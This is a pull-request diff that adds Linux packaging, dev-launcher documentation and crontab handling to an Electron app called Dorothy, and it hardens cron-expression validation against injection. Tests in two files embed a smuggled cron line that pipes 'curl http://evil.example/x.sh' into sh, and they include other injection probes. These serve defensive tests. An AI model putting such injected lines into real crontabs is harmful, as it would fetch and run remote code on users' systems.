### PR TITLE
feat: Linux support — dev launcher, distributable packages, and runtime fixes

### DIFF
--- a/.github/workflows/build-linux.yml
+++ b/.github/workflows/build-linux.yml
@@ -1,0 +1,106 @@
+name: Build - Linux
+
+# Adapted from davebulaval's Linux packaging workflow in #44, widened from deb
+# to all four targets this branch produces.
+
+on:
+  push:
+    tags:
+      - 'v*'
+  workflow_dispatch:
+
+permissions:
+  contents: write
+
+jobs:
+  build-linux:
+    name: Build Linux (Ubuntu)
+    runs-on: ubuntu-latest
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Node.js
+        uses: actions/setup-node@v4
+        with:
+          node-version-file: '.nvmrc'
+          cache: 'npm'
+
+      - name: Install dependencies
+        run: npm ci
+
+      - name: Install Linux build dependencies
+        # libarchive-tools provides bsdtar, which electron-builder uses to unpack
+        # the Electron dist; rpm is required for the rpm target.
+        run: |
+          sudo apt-get update
+          sudo apt-get install -y libarchive-tools rpm
+
+      - name: Build Linux packages
+        run: npm run electron:build:linux
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+
+      - name: Verify artifacts
+        run: |
+          shopt -s nullglob
+          fail=0
+
+          for kind in AppImage deb rpm tar.gz; do
+            files=(release/*."$kind")
+            if [ ${#files[@]} -eq 0 ]; then
+              echo "ERROR: no .$kind produced"
+              fail=1
+              continue
+            fi
+            for f in "${files[@]}"; do
+              size=$(stat --format=%s "$f")
+              echo "$kind: $f ($size bytes)"
+              # A truncated or empty package is the failure mode worth catching;
+              # a real build is >50MB because Electron is bundled.
+              if [ "$size" -lt 52428800 ]; then
+                echo "ERROR: $f is only $size bytes — expected >50MB"
+                fail=1
+              fi
+            done
+          done
+
+          for deb in release/*.deb; do
+            echo "=== $deb metadata ==="
+            dpkg-deb --info "$deb"
+            entry=$(dpkg-deb --contents "$deb" | grep -m1 'opt/Dorothy/dorothy$' || true)
+            if [ -z "$entry" ]; then
+              echo "ERROR: dorothy binary missing from $deb"
+              fail=1
+            elif [ "$(awk '{print $3}' <<<"$entry")" -eq 0 ]; then
+              echo "ERROR: dorothy binary in $deb is zero-size"
+              fail=1
+            fi
+          done
+
+          exit "$fail"
+
+      - name: Upload artifacts
+        uses: actions/upload-artifact@v4
+        with:
+          name: Dorothy-Linux-x64
+          path: |
+            release/*.AppImage
+            release/*.deb
+            release/*.rpm
+            release/*.tar.gz
+          if-no-files-found: error
+
+      - name: Upload to GitHub Release
+        if: startsWith(github.ref, 'refs/tags/v')
+        uses: softprops/action-gh-release@v2
+        with:
+          files: |
+            release/*.AppImage
+            release/*.deb
+            release/*.rpm
+            release/*.tar.gz
+            release/latest-linux.yml
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

--- a/README.md
+++ b/README.md
@@ -594,8 +594,47 @@ stale, rebuilds the native modules against the Electron ABI, and starts
 - Port 3000 must be free — `next dev` silently falls back to another port and the
   Electron window would then wait forever for `http://localhost:3000`.
 
-Packaging is macOS-only for now (`electron:build` / `electron:pack` pass `--mac`);
-this script covers development mode.
+This script covers development mode. To produce installable packages, see
+[Linux Packages](#linux-packages) below.
+
+### Linux Packages
+
+```bash
+npm run electron:build:linux              # All targets
+npm run electron:pack:linux               # Unpacked build only (fast, for testing)
+bash scripts/build-linux.sh AppImage deb  # Only specific targets
+bash scripts/build-linux.sh --help
+```
+
+Output in `release/` (x64):
+
+| Artifact | For |
+|---|---|
+| `Dorothy-<version>.AppImage` | Any distribution — no install, just `chmod +x` and run |
+| `dorothy_<version>_amd64.deb` | Debian, Ubuntu, Mint |
+| `dorothy-<version>.x86_64.rpm` | Fedora, RHEL, openSUSE |
+| `dorothy-<version>.tar.gz` | Generic unpack-and-run archive |
+
+Building deb and rpm needs `fakeroot` and `rpm` on the build host:
+
+```bash
+sudo apt install -y fakeroot rpm
+```
+
+**Notes:**
+
+- Artifacts are built against the glibc of the build host, so they run on that
+  release and newer. Building on Ubuntu 24.04 produces packages that will not start
+  on Ubuntu 22.04 or Debian 12. Build inside `electronuserland/builder` if you need
+  to support older distributions.
+- The deb/rpm post-install script tests whether unprivileged user namespaces work
+  and only makes `chrome-sandbox` SUID root when they do not, so Electron's sandbox
+  stays enabled where possible. AppImage cannot do this — on kernels that restrict
+  unprivileged user namespaces (Ubuntu 24.04+), AppImage users may need to launch
+  with `--no-sandbox`.
+- Auto-updates need `latest-linux.yml` (generated into `release/`) published
+  alongside the artifacts on the GitHub release, otherwise the updater logs a 404
+  and falls back to the GitHub API.
 
 ### Web Browser (Development)
 

--- a/README.md
+++ b/README.md
@@ -610,7 +610,7 @@ Output in `release/` (x64):
 
 | Artifact | For |
 |---|---|
-| `Dorothy-<version>.AppImage` | Any distribution — no install, just `chmod +x` and run |
+| `Dorothy-<version>.AppImage` | No install, just `chmod +x` and run — on any distribution whose glibc is at least as new as the build host's (see the note below) |
 | `dorothy_<version>_amd64.deb` | Debian, Ubuntu, Mint |
 | `dorothy-<version>.x86_64.rpm` | Fedora, RHEL, openSUSE |
 | `dorothy-<version>.tar.gz` | Generic unpack-and-run archive |

--- a/README.md
+++ b/README.md
@@ -561,6 +561,42 @@ Output in `release/`:
 - **macOS**: `release/mac-arm64/Dorothy.app` (Apple Silicon) or `release/mac/Dorothy.app` (Intel)
 - DMG installer included
 
+### Linux (Development)
+
+`scripts/run-linux.sh` takes a fresh checkout to a running app in one command:
+
+```bash
+npm run dev:linux                    # Electron dev mode
+npm run dev:linux -- --web           # Browser-only mode (http://localhost:3000)
+npm run dev:linux -- --skip-install  # Skip the dependency install step
+npm run dev:linux -- --help
+```
+
+The script checks prerequisites, installs dependencies when they are missing or
+stale, rebuilds the native modules against the Electron ABI, and starts
+`npm run electron:dev`. Ctrl-C stops the whole dev stack — no orphaned
+`next`/`electron` processes.
+
+**Requirements** (the script reports the exact `apt` line when something is missing):
+
+- **Node.js 22+** — the version in `.nvmrc`. Not in the Ubuntu/Debian archives, install it via [nvm](https://github.com/nvm-sh/nvm) or [NodeSource](https://github.com/nodesource/distributions).
+- **Build toolchain** — `sudo apt install -y build-essential python3`. `better-sqlite3` and `node-pty` have no prebuilt binaries for the Electron ABI, so they compile from source.
+
+**Notes:**
+
+- The Electron rebuild is slow, so it is cached with a stamp file
+  (`node_modules/.dorothy-electron-rebuild`) and only re-runs when the Electron
+  version or the Node ABI changes.
+- On Ubuntu 24.04+ (`kernel.apparmor_restrict_unprivileged_userns=1`) the kernel
+  blocks unprivileged user namespaces and Electron's sandbox fails to start. The
+  script detects this and exports `ELECTRON_DISABLE_SANDBOX=1`, printing a line
+  explaining what it did. On kernels without the restriction nothing changes.
+- Port 3000 must be free — `next dev` silently falls back to another port and the
+  Electron window would then wait forever for `http://localhost:3000`.
+
+Packaging is macOS-only for now (`electron:build` / `electron:pack` pass `--mac`);
+this script covers development mode.
+
 ### Web Browser (Development)
 
 ```bash

--- a/README.md
+++ b/README.md
@@ -535,7 +535,7 @@ MCP server for Twitter/X data via the SocialData API. See [SocialData (Twitter/X
 
 ### Prerequisites
 
-- **Node.js** 18+
+- **Node.js** 22 — the version pinned in `.nvmrc`
 - **npm** or yarn
 - **Claude Code CLI**: `npm install -g @anthropic-ai/claude-code`
 - **GitHub CLI** (`gh`) — required for GitHub automations

--- a/__tests__/electron/handlers/automation-handlers.test.ts
+++ b/__tests__/electron/handlers/automation-handlers.test.ts
@@ -326,6 +326,25 @@ describe('automation-handlers', () => {
       expect(fs.existsSync(path.join(tmpDir, '.dorothy', 'scripts', 'automation-del-cron.sh'))).toBe(false);
     });
 
+    it('refuses to write an injected cron expression into the crontab', async () => {
+      // given
+      writeTmpJson('.dorothy/automations.json', [{
+        ...stored('inject-1'),
+        enabled: false,
+        schedule: { type: 'cron', cron: '0 9 * * *\n* * * * * curl http://evil.example/x.sh | sh' },
+      }]);
+      await registerHandlers();
+
+      // when
+      const result = await invokeHandler('automation:update', 'inject-1', { enabled: true }) as
+        { success: boolean; error: string };
+
+      // then
+      expect(result.success).toBe(false);
+      expect(result.error).toContain('Invalid cron expression');
+      expect(crontab).not.toContain('evil.example');
+    });
+
     it('leaves unrelated crontab lines alone', async () => {
       // given
       crontab = '0 3 * * * /usr/local/bin/backup.sh\n30 4 * * * /home/me/cleanup.sh # dorothy-abc123\n';

--- a/__tests__/electron/handlers/automation-handlers.test.ts
+++ b/__tests__/electron/handlers/automation-handlers.test.ts
@@ -16,14 +16,30 @@ vi.mock('electron', () => ({
   },
 }));
 
+// Fake crontab: `crontab -l` prints it, `crontab -` replaces it.
+let crontab: string;
+
 vi.mock('child_process', () => ({
-  spawn: vi.fn(() => ({
-    stdout: { on: vi.fn() },
-    stderr: { on: vi.fn() },
-    stdin: { write: vi.fn(), end: vi.fn() },
-    on: vi.fn((event: string, cb: () => void) => { if (event === 'close') cb(); }),
-    unref: vi.fn(),
-  })),
+  spawn: vi.fn((cmd: string, args: string[] = []) => {
+    const isCrontabRead = cmd === 'crontab' && args[0] === '-l';
+    const isCrontabWrite = cmd === 'crontab' && args[0] === '-';
+    let written = '';
+
+    return {
+      stdout: {
+        on: vi.fn((event: string, cb: (data: string) => void) => {
+          if (event === 'data' && isCrontabRead && crontab) cb(crontab);
+        }),
+      },
+      stderr: { on: vi.fn() },
+      stdin: {
+        write: vi.fn((data: string) => { written += data; }),
+        end: vi.fn(() => { if (isCrontabWrite) crontab = written; }),
+      },
+      on: vi.fn((event: string, cb: (...a: unknown[]) => void) => { if (event === 'close') cb(0); }),
+      unref: vi.fn(),
+    };
+  }),
 }));
 
 vi.mock('os', async (importOriginal) => {
@@ -42,6 +58,7 @@ function invokeHandler(channel: string, ...args: unknown[]): Promise<unknown> {
 beforeEach(() => {
   vi.resetModules();
   handlers = new Map();
+  crontab = '';
   tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), 'auto-test-'));
 });
 
@@ -227,6 +244,102 @@ describe('automation-handlers', () => {
       const result = await invokeHandler('automation:delete', 'nope') as { success: boolean; error: string };
       expect(result.success).toBe(false);
       expect(result.error).toBe('Automation not found');
+    });
+  });
+
+  describe('cron scheduling on Linux', () => {
+    const stored = (id: string) => ({
+      id, name: 'Cron Me', enabled: true, createdAt: '2026-01-01', updatedAt: '2026-01-01',
+      schedule: { type: 'interval' as const, intervalMinutes: 30 },
+      source: { type: 'github', config: {} },
+      trigger: { eventTypes: [], onNewItem: true },
+      agent: { enabled: false, prompt: '' }, outputs: [],
+    });
+
+    it('adds a crontab line and a runner script on create', async () => {
+      // given
+      await registerHandlers();
+
+      // when
+      const result = await invokeHandler('automation:create', {
+        name: 'Cron Me',
+        sourceType: 'github',
+        sourceConfig: '{}',
+        scheduleMinutes: 30,
+      }) as { success: boolean; automationId: string };
+
+      // then
+      expect(result.success).toBe(true);
+      expect(crontab).toContain(`# dorothy-automation-${result.automationId}`);
+      expect(crontab).toContain('*/30 * * * *');
+      expect(fs.existsSync(path.join(tmpDir, '.dorothy', 'scripts', `automation-${result.automationId}.sh`))).toBe(true);
+    });
+
+    it('uses an explicit cron expression when one is given', async () => {
+      // given
+      await registerHandlers();
+
+      // when
+      const result = await invokeHandler('automation:create', {
+        name: 'Weekday Cron',
+        sourceType: 'rss',
+        sourceConfig: '{}',
+        scheduleCron: '0 9 * * 1-5',
+      }) as { automationId: string };
+
+      // then
+      expect(crontab).toContain(`0 9 * * 1-5 ${path.join(tmpDir, '.dorothy', 'scripts', `automation-${result.automationId}.sh`)} # dorothy-automation-${result.automationId}`);
+    });
+
+    it('removes the crontab line when disabled and restores it when re-enabled', async () => {
+      // given
+      writeTmpJson('.dorothy/automations.json', [stored('tog-1')]);
+      await registerHandlers();
+
+      // when
+      await invokeHandler('automation:update', 'tog-1', { enabled: false });
+
+      // then
+      expect(crontab).not.toContain('dorothy-automation-tog-1');
+
+      // when
+      await invokeHandler('automation:update', 'tog-1', { enabled: true });
+
+      // then
+      expect(crontab).toContain('# dorothy-automation-tog-1');
+    });
+
+    it('removes the crontab line and the script on delete', async () => {
+      // given
+      writeTmpJson('.dorothy/automations.json', [stored('del-cron')]);
+      await registerHandlers();
+      await invokeHandler('automation:update', 'del-cron', { enabled: false });
+      await invokeHandler('automation:update', 'del-cron', { enabled: true });
+      expect(crontab).toContain('dorothy-automation-del-cron');
+
+      // when
+      const result = await invokeHandler('automation:delete', 'del-cron') as { success: boolean };
+
+      // then
+      expect(result.success).toBe(true);
+      expect(crontab).not.toContain('dorothy-automation-del-cron');
+      expect(fs.existsSync(path.join(tmpDir, '.dorothy', 'scripts', 'automation-del-cron.sh'))).toBe(false);
+    });
+
+    it('leaves unrelated crontab lines alone', async () => {
+      // given
+      crontab = '0 3 * * * /usr/local/bin/backup.sh\n30 4 * * * /home/me/cleanup.sh # dorothy-abc123\n';
+      writeTmpJson('.dorothy/automations.json', [stored('keep-1')]);
+      await registerHandlers();
+
+      // when
+      await invokeHandler('automation:update', 'keep-1', { enabled: false });
+      await invokeHandler('automation:update', 'keep-1', { enabled: true });
+      await invokeHandler('automation:delete', 'keep-1');
+
+      // then
+      expect(crontab).toContain('/usr/local/bin/backup.sh');
+      expect(crontab).toContain('# dorothy-abc123');
     });
   });
 

--- a/__tests__/electron/utils/cron-validation.test.ts
+++ b/__tests__/electron/utils/cron-validation.test.ts
@@ -1,14 +1,41 @@
 import { describe, it, expect } from 'vitest';
 import { isValidCronExpression } from '../../../electron/utils/cron-parser';
 
+// The contract is deliberately "reject what is unsafe, plus what `crontab -`
+// itself rejects" — nothing stricter. Every expectation below was cross-checked
+// against `crontab -n` on Debian cron; being stricter than the real parser would
+// break schedules that used to work.
+
 describe('isValidCronExpression', () => {
-  it('accepts ordinary expressions', () => {
+  it('accepts numeric expressions', () => {
     // given -> when -> then
     expect(isValidCronExpression('*/15 * * * *')).toBe(true);
     expect(isValidCronExpression('0 9 * * 1-5')).toBe(true);
-    expect(isValidCronExpression('0 0 1 1 0')).toBe(true);
     expect(isValidCronExpression('5,10,15 */2 * * *')).toBe(true);
+    expect(isValidCronExpression('1-10/2 * * * *')).toBe(true);
+    expect(isValidCronExpression('0 0 * * 7')).toBe(true);
     expect(isValidCronExpression('  0   9   *   *   *  ')).toBe(true);
+  });
+
+  it('accepts named months and weekdays', () => {
+    // given -> when -> then
+    expect(isValidCronExpression('0 9 * * MON-FRI')).toBe(true);
+    expect(isValidCronExpression('0 9 * * mon')).toBe(true);
+    expect(isValidCronExpression('0 0 1 1 sun')).toBe(true);
+    expect(isValidCronExpression('* * * JAN-MAR *')).toBe(true);
+  });
+
+  it('accepts @-macros', () => {
+    // given -> when -> then
+    expect(isValidCronExpression('@daily')).toBe(true);
+    expect(isValidCronExpression('@reboot')).toBe(true);
+    expect(isValidCronExpression('@weekly')).toBe(true);
+  });
+
+  it('accepts wrapping and descending ranges, which cron itself allows', () => {
+    // given -> when -> then
+    expect(isValidCronExpression('0 9 * * FRI-MON')).toBe(true);
+    expect(isValidCronExpression('5-1 * * * *')).toBe(true);
   });
 
   it('rejects newline injection', () => {
@@ -21,23 +48,34 @@ describe('isValidCronExpression', () => {
   });
 
   it('rejects a percent sign, which cron treats as end-of-command', () => {
+    // given -> when -> then
     expect(isValidCronExpression('0 9 * * *%whoami')).toBe(false);
   });
 
   it('rejects the wrong number of fields', () => {
+    // given -> when -> then
     expect(isValidCronExpression('0 9 * *')).toBe(false);
     expect(isValidCronExpression('0 9 * * * *')).toBe(false);
     expect(isValidCronExpression('')).toBe(false);
   });
 
-  it('rejects out-of-range and malformed values', () => {
+  it('rejects out-of-range values', () => {
+    // given -> when -> then
     expect(isValidCronExpression('60 * * * *')).toBe(false);
     expect(isValidCronExpression('* 24 * * *')).toBe(false);
     expect(isValidCronExpression('* * 0 * *')).toBe(false);
     expect(isValidCronExpression('* * * 13 *')).toBe(false);
     expect(isValidCronExpression('* * * * 8')).toBe(false);
+  });
+
+  it('rejects malformed steps and names in the wrong field', () => {
+    // given -> when -> then
     expect(isValidCronExpression('*/0 * * * *')).toBe(false);
     expect(isValidCronExpression('a * * * *')).toBe(false);
-    expect(isValidCronExpression('1-2-3 * * * *')).toBe(false);
+    expect(isValidCronExpression('1/2/x * * * *')).toBe(false);
+    // A step only qualifies '*' or a range — cron rejects a bare "5/10".
+    expect(isValidCronExpression('5/10 * * * *')).toBe(false);
+    // Month names are not valid in the minute field.
+    expect(isValidCronExpression('JAN * * * *')).toBe(false);
   });
 });

--- a/__tests__/electron/utils/cron-validation.test.ts
+++ b/__tests__/electron/utils/cron-validation.test.ts
@@ -1,0 +1,43 @@
+import { describe, it, expect } from 'vitest';
+import { isValidCronExpression } from '../../../electron/utils/cron-parser';
+
+describe('isValidCronExpression', () => {
+  it('accepts ordinary expressions', () => {
+    // given -> when -> then
+    expect(isValidCronExpression('*/15 * * * *')).toBe(true);
+    expect(isValidCronExpression('0 9 * * 1-5')).toBe(true);
+    expect(isValidCronExpression('0 0 1 1 0')).toBe(true);
+    expect(isValidCronExpression('5,10,15 */2 * * *')).toBe(true);
+    expect(isValidCronExpression('  0   9   *   *   *  ')).toBe(true);
+  });
+
+  it('rejects newline injection', () => {
+    // given
+    const injected = '0 9 * * *\n* * * * * curl http://evil.example/x.sh | sh';
+
+    // when -> then
+    expect(isValidCronExpression(injected)).toBe(false);
+    expect(isValidCronExpression('0 9 * * *\r* * * * * id')).toBe(false);
+  });
+
+  it('rejects a percent sign, which cron treats as end-of-command', () => {
+    expect(isValidCronExpression('0 9 * * *%whoami')).toBe(false);
+  });
+
+  it('rejects the wrong number of fields', () => {
+    expect(isValidCronExpression('0 9 * *')).toBe(false);
+    expect(isValidCronExpression('0 9 * * * *')).toBe(false);
+    expect(isValidCronExpression('')).toBe(false);
+  });
+
+  it('rejects out-of-range and malformed values', () => {
+    expect(isValidCronExpression('60 * * * *')).toBe(false);
+    expect(isValidCronExpression('* 24 * * *')).toBe(false);
+    expect(isValidCronExpression('* * 0 * *')).toBe(false);
+    expect(isValidCronExpression('* * * 13 *')).toBe(false);
+    expect(isValidCronExpression('* * * * 8')).toBe(false);
+    expect(isValidCronExpression('*/0 * * * *')).toBe(false);
+    expect(isValidCronExpression('a * * * *')).toBe(false);
+    expect(isValidCronExpression('1-2-3 * * * *')).toBe(false);
+  });
+});

--- a/__tests__/electron/utils/crontab-failures.test.ts
+++ b/__tests__/electron/utils/crontab-failures.test.ts
@@ -1,0 +1,108 @@
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest';
+import { EventEmitter } from 'events';
+
+// A crontab that can be made to fail, so the paths the happy-path mock never
+// reaches — read errors, write errors, a missing binary — are actually covered.
+
+interface FakeSpawn {
+  code: number;
+  stdout?: string;
+  stderr?: string;
+  spawnError?: string;
+}
+
+let behaviour: { read: FakeSpawn; write: FakeSpawn };
+
+vi.mock('child_process', () => ({
+  spawn: vi.fn((cmd: string, args: string[] = []) => {
+    const plan = args[0] === '-l' ? behaviour.read : behaviour.write;
+    const proc = new EventEmitter() as EventEmitter & Record<string, unknown>;
+    proc.stdout = new EventEmitter();
+    proc.stderr = new EventEmitter();
+    proc.stdin = { write: vi.fn(), end: vi.fn() };
+
+    process.nextTick(() => {
+      if (plan.spawnError) {
+        proc.emit('error', new Error(plan.spawnError));
+        return;
+      }
+      if (plan.stdout) (proc.stdout as EventEmitter).emit('data', plan.stdout);
+      if (plan.stderr) (proc.stderr as EventEmitter).emit('data', plan.stderr);
+      proc.emit('close', plan.code);
+    });
+
+    return proc;
+  }),
+}));
+
+beforeEach(() => {
+  vi.resetModules();
+  behaviour = { read: { code: 0, stdout: '' }, write: { code: 0 } };
+});
+
+afterEach(() => vi.restoreAllMocks());
+
+async function utils() {
+  return import('../../../electron/utils/crontab');
+}
+
+describe('readCrontab', () => {
+  it('treats "no crontab for user" as an empty crontab', async () => {
+    // given
+    behaviour.read = { code: 1, stderr: 'no crontab for andriy\n' };
+    const { readCrontab } = await utils();
+
+    // when
+    const content = await readCrontab();
+
+    // then
+    expect(content).toBe('');
+  });
+
+  it('reports any other read failure rather than pretending the crontab is empty', async () => {
+    // given — treating this as empty would make the next write wipe the crontab
+    behaviour.read = { code: 1, stderr: 'crontab: permission denied\n' };
+    const { readCrontab } = await utils();
+
+    // when -> then
+    await expect(readCrontab()).rejects.toThrow(/permission denied/);
+  });
+
+  it('reports a missing crontab binary', async () => {
+    // given
+    behaviour.read = { code: 0, spawnError: 'spawn crontab ENOENT' };
+    const { readCrontab } = await utils();
+
+    // when -> then
+    await expect(readCrontab()).rejects.toThrow(/could not run crontab/);
+  });
+});
+
+describe('writeCrontab', () => {
+  it('reports a non-zero exit with the message cron printed', async () => {
+    // given
+    behaviour.write = { code: 1, stderr: 'errors in crontab file, cannot install\n' };
+    const { writeCrontab } = await utils();
+
+    // when -> then
+    await expect(writeCrontab('* * * * * /bin/true\n')).rejects.toThrow(/cannot install/);
+  });
+
+  it('reports a missing crontab binary', async () => {
+    // given
+    behaviour.write = { code: 0, spawnError: 'spawn crontab ENOENT' };
+    const { writeCrontab } = await utils();
+
+    // when -> then
+    await expect(writeCrontab('')).rejects.toThrow(/could not run crontab/);
+  });
+
+  it('resolves when cron accepts the file', async () => {
+    // given
+    behaviour.write = { code: 0 };
+    const { writeCrontab } = await utils();
+
+    // when -> then
+    await expect(writeCrontab('* * * * * /bin/true\n')).resolves.toBeUndefined();
+  });
+});

--- a/__tests__/electron/utils/crontab.test.ts
+++ b/__tests__/electron/utils/crontab.test.ts
@@ -1,0 +1,73 @@
+import { describe, it, expect } from 'vitest';
+import { withoutMarkedLines, hasMarkedLine, joinLines, markedLine } from '../../../electron/utils/crontab';
+
+describe('crontab helpers', () => {
+  it('removes only the line carrying the exact marker', () => {
+    // given
+    const crontab = [
+      '0 3 * * * /usr/local/bin/backup.sh',
+      '*/30 * * * * /home/me/a.sh # dorothy-automation-abc',
+      '',
+    ].join('\n');
+
+    // when
+    const lines = withoutMarkedLines(crontab, 'dorothy-automation-abc');
+
+    // then
+    expect(lines).toEqual(['0 3 * * * /usr/local/bin/backup.sh']);
+  });
+
+  it('does not remove a marker that merely has this one as a prefix', () => {
+    // given — 'abc' is a prefix of 'abcd'; a substring match would take both
+    const crontab = [
+      '*/30 * * * * /home/me/a.sh # dorothy-automation-abc',
+      '*/30 * * * * /home/me/b.sh # dorothy-automation-abcd',
+    ].join('\n');
+
+    // when
+    const lines = withoutMarkedLines(crontab, 'dorothy-automation-abc');
+
+    // then
+    expect(lines).toEqual(['*/30 * * * * /home/me/b.sh # dorothy-automation-abcd']);
+    expect(hasMarkedLine(joinLines(lines), 'dorothy-automation-abcd')).toBe(true);
+  });
+
+  it('does not confuse a scheduler marker with an automation marker', () => {
+    // given — the scheduler writes '# dorothy-<id>', automations '# dorothy-automation-<id>'
+    const crontab = [
+      '0 9 * * * /home/me/task.sh # dorothy-xyz',
+      '0 9 * * * /home/me/auto.sh # dorothy-automation-xyz',
+    ].join('\n');
+
+    // when
+    const afterScheduler = withoutMarkedLines(crontab, 'dorothy-xyz');
+    const afterAutomation = withoutMarkedLines(crontab, 'dorothy-automation-xyz');
+
+    // then
+    expect(afterScheduler).toEqual(['0 9 * * * /home/me/auto.sh # dorothy-automation-xyz']);
+    expect(afterAutomation).toEqual(['0 9 * * * /home/me/task.sh # dorothy-xyz']);
+  });
+
+  it('round-trips an empty crontab without leaving stray blank lines', () => {
+    // given
+    const crontab = '*/30 * * * * /home/me/a.sh # dorothy-automation-only\n';
+
+    // when
+    const text = joinLines(withoutMarkedLines(crontab, 'dorothy-automation-only'));
+
+    // then
+    expect(text).toBe('');
+  });
+
+  it('builds a line the marker helpers can find again', () => {
+    // given
+    const line = markedLine('*/15 * * * *', '/home/me/a.sh', 'dorothy-automation-1');
+
+    // when
+    const found = hasMarkedLine(line, 'dorothy-automation-1');
+
+    // then
+    expect(line).toBe('*/15 * * * * /home/me/a.sh # dorothy-automation-1');
+    expect(found).toBe(true);
+  });
+});

--- a/electron/core/pty-manager.ts
+++ b/electron/core/pty-manager.ts
@@ -2,6 +2,7 @@ import * as pty from 'node-pty';
 import { v4 as uuidv4 } from 'uuid';
 import * as os from 'os';
 import { BrowserWindow } from 'electron';
+import { resolveShell } from '../utils/resolve-shell';
 
 export const ptyProcesses: Map<string, pty.IPty> = new Map();
 export const quickPtyProcesses: Map<string, pty.IPty> = new Map();
@@ -107,7 +108,7 @@ export function createQuickPty(
   rows: number | undefined,
   mainWindow: BrowserWindow | null
 ): string {
-  const shell = process.env.SHELL || '/bin/zsh';
+  const shell = resolveShell();
 
   const ptyProcess = pty.spawn(shell, ['-l'], {
     name: 'xterm-256color',

--- a/electron/handlers/automation-handlers.ts
+++ b/electron/handlers/automation-handlers.ts
@@ -4,6 +4,7 @@ import * as path from 'path';
 import * as os from 'os';
 import { spawn } from 'child_process';
 import { getProvider } from '../providers';
+import { isValidCronExpression } from '../utils/cron-parser';
 import type { AgentProvider } from '../types';
 
 // ============================================
@@ -245,10 +246,16 @@ async function writeAutomationScript(automation: Automation): Promise<{
   const claudePath = await getCLIPath(automationProvider);
   const claudeDir = path.dirname(claudePath);
 
-  // Convert schedule to cron
+  // Convert schedule to cron. The expression can come from the MCP
+  // create_automation tool or straight out of automations.json, neither of which
+  // constrains it, and it ends up in the user's crontab verbatim — so reject
+  // anything that is not a plain 5-field expression before going any further.
   let cronSchedule: string;
   if (automation.schedule.type === 'cron' && automation.schedule.cron) {
-    cronSchedule = automation.schedule.cron;
+    if (!isValidCronExpression(automation.schedule.cron)) {
+      throw new Error(`Invalid cron expression: ${JSON.stringify(automation.schedule.cron)}`);
+    }
+    cronSchedule = automation.schedule.cron.trim().split(/\s+/).join(' ');
   } else {
     cronSchedule = intervalToCron(automation.schedule.intervalMinutes || 60);
   }

--- a/electron/handlers/automation-handlers.ts
+++ b/electron/handlers/automation-handlers.ts
@@ -5,6 +5,7 @@ import * as os from 'os';
 import { spawn } from 'child_process';
 import { getProvider } from '../providers';
 import { isValidCronExpression } from '../utils/cron-parser';
+import { readCrontab, writeCrontab, withoutMarkedLines, hasMarkedLine, joinLines, markedLine } from '../utils/crontab';
 import type { AgentProvider } from '../types';
 
 // ============================================
@@ -224,13 +225,24 @@ async function getClaudePath(): Promise<string> {
   return getCLIPath('claude');
 }
 
+// The id becomes part of a filename and of a crontab line, and automations.json
+// and the MCP tools do not constrain it — so anything outside this set could
+// inject a second crontab line or escape the scripts directory.
+function assertSafeAutomationId(automationId: string): void {
+  if (!/^[A-Za-z0-9_-]{1,64}$/.test(automationId)) {
+    throw new Error(`Invalid automation id: ${JSON.stringify(automationId)}`);
+  }
+}
+
 function automationScriptPath(automationId: string): string {
+  assertSafeAutomationId(automationId);
   return path.join(os.homedir(), '.dorothy', 'scripts', `automation-${automationId}.sh`);
 }
 
 // Marker appended to the crontab line so it can be found again on disable/delete.
 // Distinct from the scheduler's `dorothy-<taskId>` so neither can match the other.
 function automationCronMarker(automationId: string): string {
+  assertSafeAutomationId(automationId);
   return `dorothy-automation-${automationId}`;
 }
 
@@ -371,7 +383,6 @@ ${scheduleXml}
 async function removeAutomationLaunchdJob(automationId: string): Promise<void> {
   const label = `com.dorothy.automation.${automationId}`;
   const plistPath = path.join(os.homedir(), 'Library', 'LaunchAgents', `${label}.plist`);
-  const scriptPath = automationScriptPath(automationId);
 
   // Unload from launchd
   const uid = process.getuid?.() || 501;
@@ -385,44 +396,6 @@ async function removeAutomationLaunchdJob(automationId: string): Promise<void> {
   if (fs.existsSync(plistPath)) {
     fs.unlinkSync(plistPath);
   }
-
-  // Remove script file
-  if (fs.existsSync(scriptPath)) {
-    fs.unlinkSync(scriptPath);
-  }
-}
-
-// Read the current crontab. An empty crontab and a missing `crontab` binary both
-// read as empty, matching how the scheduler treats them.
-function readCrontab(): Promise<string> {
-  return new Promise((resolve) => {
-    const proc = spawn('crontab', ['-l']);
-    let output = '';
-    proc.stdout.on('data', (data) => { output += data; });
-    proc.on('close', () => resolve(output));
-    proc.on('error', () => resolve(''));
-  });
-}
-
-function writeCrontab(content: string): Promise<void> {
-  return new Promise((resolve, reject) => {
-    const proc = spawn('crontab', ['-']);
-    proc.stdin.write(content);
-    proc.stdin.end();
-    proc.on('close', (code) => {
-      if (code === 0) resolve();
-      else reject(new Error(`crontab failed with code ${code}`));
-    });
-    proc.on('error', reject);
-  });
-}
-
-function withoutMarker(crontab: string, marker: string): string[] {
-  const lines = crontab.split('\n').filter(line => !line.includes(marker));
-  while (lines.length > 0 && lines[lines.length - 1].trim() === '') {
-    lines.pop();
-  }
-  return lines;
 }
 
 // Create cron job for automation (Linux)
@@ -430,22 +403,26 @@ async function createAutomationCronJob(automation: Automation): Promise<void> {
   const { scriptPath, cronSchedule } = await writeAutomationScript(automation);
   const marker = automationCronMarker(automation.id);
 
-  const lines = withoutMarker(await readCrontab(), marker);
-  lines.push(`${cronSchedule} ${scriptPath} # ${marker}`);
+  const lines = withoutMarkedLines(await readCrontab(), marker);
+  lines.push(markedLine(cronSchedule, scriptPath, marker));
 
-  await writeCrontab(lines.join('\n') + '\n');
+  await writeCrontab(joinLines(lines));
 }
 
-// Remove cron job for automation (Linux)
+// Remove cron job for automation (Linux).
+// The runner script is deliberately left in place: `automation:run` executes it,
+// so a disabled automation must still be runnable by hand. Only deleting the
+// automation removes it.
 async function removeAutomationCronJob(automationId: string): Promise<void> {
   const marker = automationCronMarker(automationId);
   const existing = await readCrontab();
 
-  if (existing.includes(marker)) {
-    const lines = withoutMarker(existing, marker);
-    await writeCrontab(lines.length > 0 ? lines.join('\n') + '\n' : '');
+  if (hasMarkedLine(existing, marker)) {
+    await writeCrontab(joinLines(withoutMarkedLines(existing, marker)));
   }
+}
 
+function deleteAutomationScript(automationId: string): void {
   const scriptPath = automationScriptPath(automationId);
